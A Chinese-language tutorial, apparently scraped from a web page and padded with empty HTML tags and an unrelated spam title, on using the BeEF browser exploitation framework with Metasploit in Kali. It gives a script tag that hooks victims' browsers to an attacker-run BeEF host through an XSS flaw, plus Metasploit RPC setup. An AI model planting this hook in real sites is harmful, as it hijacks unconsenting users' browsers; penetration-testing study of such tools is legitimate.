<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                ??碼云GVP開源項目 12k star Uniapp+ElementUI 功能強大 支持多語言、二開方便! 廣告
                BeEF是瀏覽器攻擊框架的簡稱,是一款專注于瀏覽器端的滲透測試工具。 官網[http://beefproject.com](http://beefproject.com) kali中已經內置了BeEF,直接啟動輸入beef/beef登錄即可。 ![](https://box.kancloud.cn/60219e857a458134a10da0dfceb54427_597x94.png) 根據提示,訪問UI界面。 然后將下面代碼輸入到存在XSS漏洞的地方hook一個瀏覽器: `<script src="http://BeEF主機-IP:3000/hook.js"></script>` ![](https://box.kancloud.cn/21ba32fa0abdf51722bdf60caeadca69_1119x437.png) 如上圖,已經成功hook瀏覽器。 **連接metasploit:** (此部分選自[limit_anonymous](https://blog.csdn.net/u013526533)的51cto博客 原文地址:https://blog.csdn.net/u013526533/article/details/52449964 ) 要使用Metasploit豐富的攻擊模塊,需要做些配置 此時先確定以把更新源換為國內的: > 進入目錄/etc/apt/sources.list deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free deb-src http://mirrors.ustc.edu.cn/kali-security kali-current/updates main contrib non-free deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free > 然后更新系統: > apt-get update > apt-get upgrade > apt-get dist-upgrade > reboot 重啟之后 先切換進BEEF的目錄下面:cd /usr/share/beef-xss/ 切換進去之后,里面有個config.yaml文件,進行編輯 把metasploit功能模塊,enable設置為true 然后在當前目錄切換到:cd extensions/metasploit/ 需要配置三個地方: ~~~ host:本機IP callback host:本機IP {os: 'custom',path: '/usr/share/metasploit-framework/'} ~~~ 然后啟動msfconsole控制臺,輸入:load msgrpc ServerHost=IP Pass=abc123 這里的IP設置為你本機IP,不要設置為127.0.0.1![](https://img-blog.csdn.net/20160906151630254?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQv/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/Center) 這時重新打開一個窗口切換到BEEF目錄下:`cd /usr/share/beef-xss/` 然后輸入`./beef`來啟動BEEF 之后顯示加載了292個metasploit模塊,然后打開beef就可以看到加載的metasploit模塊了 **關于BeEF的選項夾和功能** main:在運行一些命令模塊后,顯示瀏覽器的信息 logs:顯示連接日志 commands:命令模塊執行功能的地方 > 每個命令模塊都有一個交通圖燈,用來指示以下內容: > 命令模塊對目標進行操作,并且對目標不可見 > 命令模塊針對目標工作,但目標可以看到 > 該命令模塊還未對目標進行驗證 > 該命令模塊不針對此目標進行工作 ![](https://box.kancloud.cn/55adc46897819d4ac2bf2d3ff2f5a622_429x74.png) XssRays: XssRays選項卡允許用戶檢查頁面的鏈接、表單和URI路徑是否容易受到XSS的攻擊。 Rider: Rider選項卡允許您為鉤狀瀏覽器提交任意的HTTP請求。 Network:網絡選項卡允許您與托管瀏覽器的本地網絡上的主機進行交互。 * * * * * 使用案例(給被劫持瀏覽器彈窗口): `commands-Misc-Raw JavaScript-Execute`
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看